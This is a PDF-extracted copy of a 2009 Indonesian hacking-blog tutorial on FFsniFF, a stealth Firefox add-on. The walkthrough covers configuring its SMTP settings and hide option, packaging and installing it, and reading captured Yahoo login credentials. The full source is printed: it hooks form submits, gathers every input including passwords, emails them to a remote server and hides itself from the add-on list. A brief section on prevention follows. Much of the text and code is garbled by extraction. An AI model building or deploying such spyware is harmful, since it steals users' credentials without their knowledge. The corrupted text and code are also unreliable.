Download - Menjaring Password Dengan FireFox

7/23/2019 Menjaring Password Dengan FireFox

http://slidepdf.com/reader/full/menjaring-password-dengan-firefox 1/12

Menjaring Password dengan Firefox Sniffer On February 27, 2009, in How to, Web Security, by Rizki Wicaksono

Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak

sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semuaaddon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password

pengguna ketika login ke email attacker, addon itu adalah FFsniFF.

Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan

mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. etelah itu saya akan jelaskan cara

kerja FFsniFF dengan membedah source codenya.

Sekilas tentang addon Firefox

!ddon firefox adalah program dalam ja"ascript yang diload dan diaktifkan setiap firefox dijalankan.

!ddon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox #firefox hanya

menyediakan fungsi-fungsi dasar saja$. !ntarmuka addon ada yang berbentuk ikon di status bar, toolbar

atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki

antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.

!ddon dipaketkan dan disebarkan dalam bentuk file %&', namun ekstensi filenya bukan (ip melainkan

)'& #dibaca *(ippy+$. Dalam file xpi tersebut ada banyak file dan folder lain seperti source code ja"ascript,

gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket (ippy adalah

123

4567891011

exampleExt.xpi: /install.rdf

/components/*

/components/cmdline.s/defa!lts/

/defa!lts/preferences/*.s/pl!"ins/*/c#rome.manifest/c#rome/icons/defa!lt/*/c#rome/

/c#rome/content/

install.rdf adalah deskriptor untuk keperluan instalasi. elain itu di dalam paket itu juga ada file

ja"ascript yang berisi kode program yang menjalankan fungsi addon. elebihnya adalah file-file untuk

menangani user interface addon.

Membuat paket instalasi ffsniff.xpiangkah awal saya harus membuat paket instalasi addon ffsniff.xpi. ntuk itu saya harus mengunduh file

sumber FFsniFF dari http//a(urit.elbiahosting.sk/ffsniff/. etelah diunduh, file tar.g( itu harus

dimekarkan. &si dari paket itu setelah dimekarkan adalah12345

p$"%creator.p&src/src/install.rdfsrc/c#rome/src/c#rome/content/

http://www.ilmuhacking.com/web-security/menjaring-password-dengan-firefox-sniffer/

http://www.ilmuhacking.com/how-to/

http://www.ilmuhacking.com/web-security/


http://azurit.elbiahosting.sk/ffsniff/


http://www.ilmuhacking.com/how-to/



http://www.ilmuhacking.com/web-security/menjaring-password-dengan-firefox-sniffer/



6789

src/c#rome/content/ffsniff/src/c#rome/content/ffsniff/ffsniff'(erla&.x!lsrc/c#rome/content/ffsniff/ffsniff'(erla&%ori".ssrc/c#rome/content/ffsniff/contents.rdf

File tar.g( itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus

diubah dan dibungkus menjadi paket (ippy #xpi$. ebenarnya untuk membuat paket (ippy sudah

disediakan script pkgcreator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai

script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.

etelah source berhasil didownload, berikutnya saya harus membuat file ffsniff0"erlay.js, caranya adalah

dengan mengcopy file ffsniff0"erlayorig.js dalam nama ffsniff0"erlay.js. etelah itu ffsniff0"erlay.js

akan saya edit untuk mengubah beberapa "ariabel berikut

12345

67

(ar send%from%#ost ) +,E-%'%',(ar send%from ) +,E-%'(ar send%to ) +,E-%'(ar s!ect ) +,E(ar smtp%#ost ) +,;%',

(ar smtp%port ) +,;%;'(ar enale%#ide ) +<<-=

Konfigurasi smtp untuk @ilmuhacking.com

1) record ilmuhacking.com

2ariabel-"ariabel tersebut adalah parameter untuk mengirim email melalui smtp. smtphost berisi

alamat smtp ser"er yang dipakai untuk mengirim email. ebaiknya gunakan smtp ser"er yang

bertanggung jawab untuk domain email yang kita tuju,dalam kasus ini domain email tujuan adalah

3ilmuhacking.com. 0leh karena itu saya harus mencari smtp ser"er yang bertanggung jawab untuk

domain ilmuhacking.com. 4ara mencarinya adalah dengan melihat 1) record dari DN

ilmuhacking.com. !nda bisa gunakan layanan dnswatch.info untuk mencari 1) record ilmuhacking.com.

'erhatikan gambar di samping, terlihat bahwa ternyata smtp ser"er untuk ilmuhacking.com berada di

host yang sama, jadi smtphost saya isi dengan ilmuhacking.com. 'ada domain lain biasanya mail ser"er

adalah mail.domainanda.com.

sendfrom dan sendto saya isi dengan nilai yang sama, yaitu testing3ilmuhacking.com, alamat itu

adalah alamat email asal dan tujuan. 'erhatikan bahwa domain email sumber dan tujuan harus dalam

domain yang sama #ilmuhacking.com$ karena smtp ser"er umumnya tidak bersedia mengirimkan email

ke domain lain #istilahnya open relay$ bila pengirim tidak memasukkan password dulu #anonymous$.

http://www.dnswatch.info/





enablehide sengaja saya isi *no+ untuk kemudahan, dalam kasus nyata "ariabel ini harus diisi dengan

*yes+ agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. 5ila anda masih coba-

coba, sebaiknya isi dulu dengan *no+.

smtpport adalah port smtp ser"er, port standar untuk layanan smtp adalah 67. subject adalah subject

dari email yang akan berisi password korban.

1234567

(ar send%from%#ost ) ilm!#ac$in".com(ar send%from ) testin">ilm!#ac$in".com(ar send%to ) testin">ilm!#ac$in".com(ar s!ect ) ?o" irefox ,niffer(ar smtp%#ost ) ilm!#ac$in".com(ar smtp%port ) 25(ar enale%#ide ) no

Konfigurasi smtp untuk @telkom.net

!gar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke

telkom.net.Dengan cara yang sama saya harus membaca 1) record dari domain telkom.net, ternyata 1)

record untuk telkom.net ada 6 mx8.mail.plasa.com dan mx6.mail.plasa.com. 9erserah mau pilih yang

mana saja. :arena memakai smtp ser"er telkom.net, email tujuan harus berada di domain 3telkom.net,

di sini saya pakai ri(ki.wicaksono3telkom.net. !lamat asal saya isi sama dengan email tujuan. &ni berarti

saya mengirim email dari dan ke email yang sama, itu tidak masalah. sendfromhost saya isi dengan

telkom.net karena ini adalah domain. ;adi konfigurasi smtp untuk email tujuan 3telkom.net adalah

sebagai berikut

123456

7

(ar send%from%#ost ) tel$om.net(ar send%from ) ri@$i.Aica$sono>tel$om.net(ar send%to ) ri@$i.Aica$sono>tel$om.net(ar s!ect ) ?o" irefox ,niffer(ar smtp%#ost ) mx1.mail.plasa.com(ar smtp%port ) 25

(ar enale%#ide ) no

Membuat file ffsniff.jar

etelah "ariabel-"ariabel di file ffsniff0"erlay.js sudah diubah, langkah berikutnya adalah membuat file

ffsniff.jar. <alaupun ekstensi filenya adalah jar, sebenarnya ini adalah file (ip biasa. File-file yang

dimasukkan dalam ffsniff.jar adalahcontent/ffsniff/contents.rdfcontent/ffsniff/ffsniff'(erla&.scontent/ffsniff/ffsniff'(erla&.x!l

=asil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh > file itu di(ip tanpa

mengikutsertakan foldernya. ;adi untuk membuat file ffsniff.jar harus berada di parent folder dari

content/ffsniff. !nda bebas menggunakan program apa saja untuk kompresi (ip ini, saya sendiri memakai

<in?!?. :etika dibuka dengan <&N?!? isi dari ffsniff.jar tampak seperti gambar di bawah ini,

perhatikan kolom pathnya harus berisi seperti itu.



ffsniff.jar list files

Membuat file ffsniff.xpi

etelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini

juga file (ip biasa, walaupun ekstensinya .xpi. &si file ffsniff.xpi adalah dua file berikut

install.rdfc#rome/ffsniff.ar

;angan lupa juga ffsniff.jar harus di(ip dalam folder chrome. @ambar di bawah ini menunjukkan

ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.

ffsniff.xpi file list

Instalasi Firefox Sniffer

0ke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. :ini saya bisa menginstall addon

tersebut. 4ara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file

xpi pada addressbar firefox. etelah muncul daftar file di firefox, klik file xpi yang akan diinstall. 4ara

instalasi FFsniFF diperlihatkan pada gambar di bawah ini. etelah berhasil install jangan lupa untuk

restart firefox anda.

instalasi firefox sniffer



Mencoba login ke yahoo

:ini saya akan mencoba login ke yahoo dengan username ri(kiwicaksono. etelah login, saya periksa

inbox email testing3ilmuhacking.com. 9ernyata email hasil sniff password ketika login ke yahoo sudah

masuk. &si emailnya terlihat pada gambar di bawah ini.

log sniffer email

Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua

field dengan tag input #input typeA+xxx+$ dari form, yaitu password field, hidden field, text field,

checkbox. elain itu FFsniff juga mencatat ?, nama field, jenis dan nilainya. FFsniFF hanya

mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.

Email Sniffer og

1ari kita perhatikan email yang dikirimkan FFsniFF. =eader lengkap email yang dikirim FFsniff adalah

sebagai berikut

123456789

et!rnBpat#: +testin">ilm!#ac$in".comEn(elopeBto: testin">ilm!#ac$in".comeli(er&Bdate: riC 27 e 2009 03:23:48 B0600ecei(ed: from D202.43.xxx.xxx Fport)23982 #elo)ilm!#ac$in".comG & "ator669.#ost"ator.com Ait# esmtp FExim 4.69G Fen(elopeBfrom +testin">ilm!#ac$in".comG id 1?c&AaB0002HB for testin">ilm!#ac$in".com riC 27 e 2009 03:23:48 B0600,!ect: ?o" irefox ,niffer

Dalam email tersebut hanya ada 8 header ?ecei"ed, yaitu dari host 6B6.C>.xxx.xxx #ip lengkap saya

sensor$. =al ini menunjukkan bahwa smtp ser"er yang saya pakai kebetulan adalah smtp ser"er yang

paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp ser"er lain. 5erikut ini adalahheader email FFsniFF yang dikirim ke telkom.net

et!rnB;at#: +ri@$i.Aica$sono>tel$om.netecei(ed: from D125.160.17.193 FE?' mx1.mail.tel$om.netG & f1.c.plasa.com Fomm!ni=ate ;ro ,; 4.3.9G Ait# E,;, id 690188427 for ri@$i.Aica$sono>tel$om.net IedC 04 ar 200911:05:27 J0700ecei(ed: from mx1.mail.plasa.com FD222.124.18.71G

& mx1.mail.tel$om.net Ait# esmtp id 1?eiH&B0001K;B'1



for ri@$i.Aica$sono>tel$om.net IedC 04 ar 2009 11:04:20 J0700LB<ron;ortBMntiB,pamBiltered: tr!eLB<ron;ortBMntiB,pamBes!lt:M""NMJrnHH6ce/2ds2#Mos<O==Po<;ss#MOH,;OE",A=LB<ron;ortBMP: E)cMfeei)5300C2777C5542 a)119895912ecei(ed: from xxxxdtp.net.id FE?' tel$om.netG FD202.43.xx.xxG & mx1.mail.plasa.com Ait# E,; 04 ar 2009 11:02:49 J0700,!ect: ?o" irefox ,nifferLBMB#ec$: NE,ate: IedC 04 ar 2009 11:05:27 J0700essa"eB<: +a!toB000690188427>f1.c.plasa.com

Dalam email ke telkom.net ada > header ?ecei"ed. ang pertama adalah mx8.mail.plasa.com, ini adalah

smtp ser"er yang saya pakai di FFsniFF. :emudian dari situ email dioper ke mx8.mail.telkom.net, dan

terakhir dioper lagi ke f8.c.plasa.com, yang merupakan smtp ser"er yang paling dekat dengan si penerima.

;adi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp ser"er

f8.c.plasa.com. Namun karena 1) record telkom.net menunjuk ke mx8.mail.telkom.net lebih baik saya

pakai smtp ser"er itu, walaupun perlu dioper sebanyak 6 kali untuk sampai di tujuan.

FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication

sebelum mengirimkan email. 19' ser"er tidak mungkin menolak email yang ditujukan untuk domain

yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous #tanpa authentication$, sebab

bila smtp ser"er menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke

domain itu.

:arena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain

ilmuhacking.com karena smtp ser"er tersebut kemungkinan besar akan menolak dijadikan titik relay

pengiriman email ke domain lain. 5ila ingin mengirimkan email untuk domain lain tidak bisa secara

anonymous, sebelumnya harus memasukkan perintah smtp !9= 0@&N dan memasukkan

username/password dalam baseEC. aya tidak akan menjelaskan terlalu panjang soal email, di lainkesempatan akan saya bahas detil cara kerja email.

!encegahan

5ad guys already know about FFsniff since > years ago

FFsniff diciptakan pada bulan maret 6BBE, tepat > tahun yang lalu sehingga addon ini sudah dikenal luas

sebagai salah satu tools hacking. ekarang bagaimana caranya agar kita tidak menjadi korban addon ini

5erikut ini tips agar tidak menjadi korban FFsniff

;angan sembarangan menginstall addon yang tidak anda kenal. &nstall addon hanya dari situs

resmi Firefox !ddon https//addons.mo(illa.org/ &nstall !ddon hanya dari situs yang menggunakan https. 'enggunaan https ini sangat penting

agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah

diracuni spyware. 1engenai pentingnya https ini bisa anda baca di artikel understanding https

http://www.ilmuhacking.com/cryptography/understanding-https/





firefox safe mode

5ila anda berada di komputer publik, gunakan Firefox dalam afe 1ode #mode aman$. 1ode ini

adalah mode menjalankan firefox dengan mematikan semua addon yang ada.

<alaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia

tidak mungkin bisa bersembunyi di file system. ;ika anda ragu apakah firefox anda bersih dari

FFsniFF, silakan buka folder 'rofile 1o(illa Firefox anda. 5iasanya di

1:Qoc!ments and ,ettin"sQ+!sernameQMpplication ataQo@illaQirefoxQ;rofilesQtextQextensionsQ

firefox extension folder

:emudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. !tau anda juga

bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.

"o# FFsniff $orks

aya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password

ketika ada yang login di firefox yang telah dipasang addon ini. :ini saatnya saya menjelaskan cara

kerja FFsniff ini. &nti dari FFsniff ini ada pada file ffsniff0"erlay.js. File ini berisi semua code yang

melakukan sniffing. 5erikut adalah source code lengkap ffsniff0"erlay.js.

1234567891011121314

var transport,er(ice ) omponents.classesD>[email protected]"/netAor$/soc$etBtransportBsvar transport ) var o!tstream ) var instream ) omponents.classesD>[email protected]"/scriptaleinp!tstream1.create<nsvar stream ) // find out FF version

var app<nfo ) omponents.classesD>[email protected]"/xre/appBinfo1."et,er(iceFomponenvar (ersion#ec$er ) omponents.classesD>[email protected]"/xpcom/(ersionBcomparator1. var data ) var data0 ) E?' J send%from%#ost J \r\nvar data1 ) M<? ': + J send%from J \r\nvar data2 ) ; ': + J send%to J \r\nvar data3 ) MM\r\n



1516171819202122232425262728293031323334

353637383940414243444546474849505152535455565758596061

62636465666768697071

var data4 ) \r\n.\r\nvar data5 ) O<\r\nfunction send%dataFG R

transport ) transport,er(ice.createransportFnullC 0C smtp%#ostC smtp%poo!tstream ) transport.open'!tp!t,treamF0C 0C 0Gstream ) transport.open<np!t,treamF0C 0C 0Ginstream.initFstreamG

// this will avoid 'Improper use of SMTP command pipelining'

// error on SMTP servers

o!tstream.AriteFdata0C data0.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG


o!tstream.AriteFdata2C data2.len"t#GA#ile Finstream.a(ailaleFG )) 0G RS

instream.readFinstream.a(ailaleFGG o!tstream.AriteFdata3C data3.len"t#GA#ile Finstream.a(ailaleFG )) 0G RSinstream.readFinstream.a(ailaleFGG

o!tstream.AriteFdataC data.len"t#G// don't read here cos no data was send to us

//while (instream.available( !! " #$

//instream.read(instream.available(%


o!tstream.AriteFdata5C data5.len"t#GA#ile Finstream.a(ailaleFG )) 0G RS

o!tstream.closeFGinstream.closeFG

S

if F(ersion#ec$er.compareFapp<nfo.(ersionC 3.0G ) 0G Rvar Aor$in"#read ) functionFG RS

Aor$in"#read. prototype ) R

r!n: functionFG Rsend%dataFG

SS

S else Rvar r!nnale ) R

r!n: functionFG Rsend%dataFG

SS

S

function sniffFG R



7273747576777879808182838485868788899091

9293949596979899100101102103104105106107108109110111112113114115116117118

119120121122123124125126127128

// if we are running under &." or later

if F(ersion#ec$er.compareFapp<nfo.(ersionC 3.0G ) 0G Rvar t#read ) omponents.classesD>[email protected]"/t#readBmana"er1."et#read.dispatc#Fnew Aor$in"#readFGC t#read.<,;M%-'M?G

S else R

var t#read ) omponents.classesD>[email protected]"/t#read1."et,er(icet#read.initFr!nnaleC 512*1024C omponents.interfaces.ns<#read.;

omponents.interfaces.ns<#read.,ME%-'<-M?EGS

S

function do%sniffFG R

var o$ ) 0var #esla ) AindoA.content.doc!ment."etElements&a"-ameFinp!tGdata ) for Fvar i ) 0 i + #esla.len"t# iJJG R

if F#eslaDi.(al!e T) G Rif F#eslaDi.t&pe )) passAordG R

o$ ) 1

Sif F#eslaDi.name )) G R

data J) #eslaDi.t&pe J : J +lan$: J #eslaDSelse R

data J) #eslaDi.t&pe J : J #eslaDi.name J: S

SS

if Fo$ )) 1G Rdata ) ,!ect: J s!ect J \r\n\r\n J AindoA.top.content.docsniffFG

SS

function #ide%meFG Rvar ,er(ice ) omponents.classesD>[email protected]"/rdf/rdfBser(ice1."et,evar ontainer ) omponents.classesD>[email protected]"/rdf/container1.create<nvar extension, ) omponents.classesD>[email protected]"/extensions/mana"er1."var root ) ,er(ice.=eteso!rceF!rn:mo@illa:item:rootGvar nameMrc ) ,er(ice.=eteso!rceF#ttp://[email protected]"/2004/emBrdfUnaontainer.<nitFextension,C rootGvar elements ) ontainer.=etElementsFGA#ile Felements.#asoreElementsFGG R

var element ) elements."et-extFGvar name ) var tar"et ) extension,.=etar"etFelementC nameMrcC trueGif Ftar"etG R

name ) tar"et.O!er&<nterfaceFomponents.interfaces.ns<?if Fname )) sniG R

ontainer.emo(eElementFelementC trueGS

SS

S

if Fenale%#ide )) &esG R#ide%meFG

S

AindoA.addE(ent?istenerFs!mitC do%sniffC falseG



'erhatikan baris ke-86G pada source di atas, bila enablehide diset *yes+, maka ffsniff akan

menjalankan fungsi hideme#$. hideme#$ bertugas menghilangkan FFsniff dari daftar addon agar

kehadirannya tidak disadari pengguna. 4ara menyembunyikan diri adalah dengan cara menjalankan

fungsi 4ontainer.?emo"eHlement #baris ke-866$ hanya bila element itu bernama *FFsniFF+.

how ffsniff works

Fungsi sniffing sesungguhnya ada pada baris terakhir. 'ada baris terakhir, terdapat fungsiaddH"entistener#$. Fungsi ini berguna untuk mengaitkan e"ent submit dengan fungsi dosniff.

!rtinya fungsi dosniff akan dijalankan setiap kali terjadi e"ent submit. H"ent submit akan terjadi

bila ada reIuest '09 di browser, antara lain dengan melalui klik tombol bertipe submit #input

typeA+submit+$. Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh ja"ascript.

Dengan cara apapun, bila terjadi reIuest '09 di browser, e"ent submit akan terjadi, dan artinya

fungsi dosniff juga akan dipanggil. ntuk lebih jelasnya perhatikan gambar di atas.

:ini fokus perhatian kita pindah ke fungsi dosniff #baris ke-JC$. Dalam fungsi sniff, ffsniffer

mengambil daftar semua tag KinputL yang ada dengan fungsi

window.content.document.getHlements5y9agName#*input+$. :emudian semua field tersebut akan

digabung dalam "ariabel string data. =anya bila dalam form tersebut terdapat password field #inputtypeA+password+$, maka ffsniffer akan mengirimkan email, bila hanya form biasa #bukan form login$,

ffsniffer tidak akan mengirim email.

5ila mengandung password field, berikutnya fungsi sniff #baris ke-G>$ akan dijalankan. Fungsi sniff

ini tugasnya hanya membuat dan menjalankan thread. 9hread tersebut bertugas melakukan

pengiriman email dengan memanggil fungsi senddata #baris ke-8G$. Fungsi senddata akan

membuka koneksi tcp ke smtp ser"er, kemudian mengirimkan perintah smtp untuk mengirim email.

Dengan menggunakan sniffer <ireshark, berikut adalah komunikasi yang terjadi ketika email dikirim

ke telkom.net

12345678910

220Bmx1.mail.plasa.com E,;220 EC pornC and a!si(e content not alloAedE?' tel$om.net250Bmx1.mail.plasa.com250B8<<E250 ,<VE 20971520M<? ': +ri@$i.Aica$sono>tel$om.net250 sender +ri@$i.Aica$sono>tel$om.net o$; ': +ri@$i.Aica$sono>tel$om.net250 recipient +ri@$i.Aica$sono>tel$om.net o$



1112131415161718192021222324252627282930

31323334

MM354 "o a#ead,!ect: ?o" irefox ,niffer #ttps://lo"in.&a#oo.com/confi"/lo"inWt&pe:name:(al!eBBBBBBBBBBBBBBB#idden:.tries:2#idden:.intl:!s#idden:.!:6220o3t4Kr(31#idden:.(:0#idden:.c#allen"e:##09VLeN4r"=$r,$ir#.Le$%#idden:#ass"r:0#idden:.c#$;:N#idden:.done:#ttp://m&.&a#oo.com#idden:.pd:%(er)0Xc)Xi(t)Xs")text:lo"in:ri@$iAica$sonopassAord:passAd:inipassAord$!c#ec$ox:.persistent:&s!mit:.sa(e:,i"n <n

.250 o$: essa"e 119895912 accepted221 mx1.mail.plasa.comO<

edangkan komunikasi yang terjadi ketika email dikirim ke 3ilmuhacking.com adalah

220B"ator669.#ost"ator.com E,; Exim 4.69 U1 !eC 03 ar 200922:15:33 B0600220BIe do not a!t#ori@e t#e !se of t#is s&stem to transport!nsolicitedC220 and/or !l$ eBmail.E?' ilm!#ac$in".com250B"ator669.#ost"ator.com ello ilm!#ac$in".com D202.43.xxx.xxx

250B,<VE 52428800250B;<;E?<-<-=250BM ;?M<- ?'=<-250B,M?,250 E?;M<? ': +testin">ilm!#ac$in".com250 'H; ': +testin">ilm!#ac$in".com250 McceptedMM354 Enter messa"eC endin" Ait# . on a line & itself,!ect: ?o" irefox ,niffer #ttps://lo"in.&a#oo.com/confi"/lo"inWt&pe:name:(al!eBBBBBBBBBBBBBBB#idden:.tries:1#idden:.intl:!s#idden:.!:el(tc94Ks023#idden:.(:0#idden:.c#allen"e:7I@fnmn3-(1NadcIn61?&<A#idden:#ass"r:0#idden:.c#$;:N



#idden:.done:#ttp://m&.&a#oo.com#idden:.pd:%(er)0Xc)Xi(t)Xs")text:lo"in:ri@$iAica$sonopassAord:passAd:inipassAorda$!!"ac#ec$ox:.persistent:&s!mit:.sa(e:,i"n <n.250 'H id)1?eiI6B0002@!B?MO<221 "ator669.#ost"ator.com closin" connection

Dengan selesainya eksekusi senddata#$ maka ffsniff telah selesai menjalankan tugasnya mengirim

email. elanjutnya ffsniff akan *tidur+ menunggu dipanggil oleh e"ent submit dan mulai kembali

proses penyadapan password.

Download - Menjaring Password Dengan FireFox

Top Related